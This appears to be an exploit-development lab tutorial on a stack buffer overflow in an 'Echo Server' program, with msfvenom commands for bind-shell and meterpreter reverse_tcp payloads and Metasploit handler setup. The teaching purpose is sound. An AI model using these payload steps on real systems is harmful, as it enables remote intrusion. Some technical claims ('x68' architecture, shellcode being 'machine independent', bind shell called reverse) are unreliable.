In the previous article, we analyzed the Echo Server program in which we understood things like Crashing the program remotely by manipulating input with the help of tools, Identifying the overwritten position in the memory etc. Given below are some notable points from the previous article that will be used in this article.
Server Program is crashed after inputting the 2000 character as in input.
EIP overwritten position is 8-byte data after the 1036 input.
We assume that readers have enough knowledge about how to crash an echo server program and about identifying the return address position by manipulating user input with the help of special scripts. In this article, we will be developing and working an exploit for the Echo Server program. Now, let’s proceed.
So, let’s run our python script again on machine B and following will be the output on the Machine A.
We can see in the above screenshot that EIP is overwritten by 42424242 (B’s in Hexadecimal) and Top of the Stack is holding to 43434343(C’s in Hexadecimal). So, for better understanding, let’s do some changes in the python script. As of now, our python script is following.
Now, we will append another 4 C’s after the B’s and then some D’s in the python script. After making these changes the script will look like the one given below.
After saving the script, restart the Echo-Server program which is running with debugger in Machine A. We could do the same by pressing CTRL+F2. Now, after running the above python script we can see that the server program is again crashed which can be seen in the screenshot given below.
When we closely look into the debugger, we notice the following things.
EIP is pointing 42424242 which is our B’s
Top of Stack is holding the value 43434343 which is our C’s
After that, we can see there are multiple 44444444 values in the stack that are filled by the user input.
As we have already seen in previous articles, that if we change the EIP position in the memory we can actually change the way of the program execution. So let’s change the EIP register value with C’s address. The C’s (43434343) address in the memory is 0022F730. We can also see the same in the above screenshot. Now, we will have to replace the B’s with 0022F730 in the python script that we have created in machine B. However; it is a little tricky to write the memory address in the user input. We know that stack works with Last-in-First-Out rule, so we will have to write the address in reverse order. So, the C’s address would be.
Now, in python script let’s replace B’s with this address. After making the above change in the script the python script will look like this.
It can be seen in the above screenshot that we have replaced B’s with the C’s address, now let’s create a break point on the RETN instruction in the machine A so that we can analyse the things in a better way. (We have already explained the basics like what is breakpoint, how do we create breakpoints and what is RETN instruction etc. in previous articles, so we are not going to explain it here.)
As shown in the above screenshot, we have created the breakpoint in the debugger. Now, we will run the program in debugger, and run the python script on the machine B and we will see the following output on the machine A.
As can be seen in the above screenshot that the program execution has reached to the RETN instruction where we had created the breakpoint in previous steps. But if we closely look into the debugger we can see some interesting things which can be seen in following screen shot.
Until now, we have successfully overwritten the EIP value by changing the user input and control the execution of the program.
Now, we will put some special type of code in the user input so that we can do some more interesting things. This special type of code is called the Shell Code.
A Shell Code is a piece of code that is directly executed by the computer. Shell Codes generally do not require any kind of compilation process before execution that is why the shell code is machine independent. We can create a shell code by ourselves or we can also use some other tools to generate the Shell Code.
Generating Reverse TCP Payload:
In this exploit writing series, we will use Metasploit Tool, which is available by default in Kali Linux Machine to generate our shell code.
To generate the shell code we are going to use a utility called “Msfvenom”. We can generate the shell code by running the following command. Here, we are using a TCP reverse connection shell code that will open 4444 port on the server. (There are multiple shell codes or payload is available which could be used according to the requirements.)
msfvenom -p windows/shell_bind_tcp -f c -a x68
Setting Up the Payload with the Exploit:
It can be seen in the above screenshot that our payload is successfully generated. Now, we will copy the exploit code and replace the D’s in the python script with this code. After these changes, the python script will look like this.
Now, after saving this python script, we will restart the debugger in machine A and run the python script again in machine B.
As we can see in the above screenshot, the server program is again reached to the RETN instruction, now, we continue the program by hitting the F9 key.
Exploit Execution and getting the Reverse Shell:
We can see in the above screen shot, after continuing the execution, the Echo Server program does not crash as per the previous cases. This would be great news for us.
The shell code, which we have inserted by the user input, is executing in the computer memory that is the reason, program does not crashed. So, now let’s try to connect with NetCut on 4444 port by the machine B.
As can be seen in the above screenshot, we have successfully exploited the Echo Server EXE program and got the command shell. Now, let’s run the Echo Server program without the debugger on machine A and launch the python script to verify the same.
As shown in the above screenshot, we have run Echo Server program on machine A and run the python script on machine B but the server program does not crash. When we hit the NetCut tool on 4444 port, we successfully got the TCP connection on the attacker machine B.
Generating Setting up the Metrepreter Payload:
So, we have successfully created a Reverse TCP exploit for Echo Server program. Now, let’s inject another payload in the exploit that will give us the meterpreter shell.
First, we will have to create a shell code for the payload; we can do the same by executing the following command on the terminal.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.84 -f c -a x86
In this command, we have used an IP address that is the kali Linux machine IP address where the reverse connection will come when we send our exploit.
Our small payload is ready; now replace the payload in the python script with the previous one. We will also have to prepare the Metasploit console to accept the reverse connection.
So let’s start the Metasploit in the attacker machine which is machine B and run the following command to launch the Metasploit.
It will take some time to start, after the Metasploit starts we can see the following screen.
Now, run the following command to setup the handler.
- Use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.84
Exploitation with Meterpreter:
Now, everything is set from the attacker’s side on machine B. So, we will run the Echo Server program on the machine A and the python script on machine B and verify whether we get the reverse connection or not.
As can be seen in the above screenshot, we got the reverse connection from the victim machine. That is a great news for us.
We have understood the following things by completing this exercise:
- Creating the Shell Code with the help of Metasploit
- Writing Reverse TCP exploit for Echo Server Application
- Exploiting the Application with Different Payload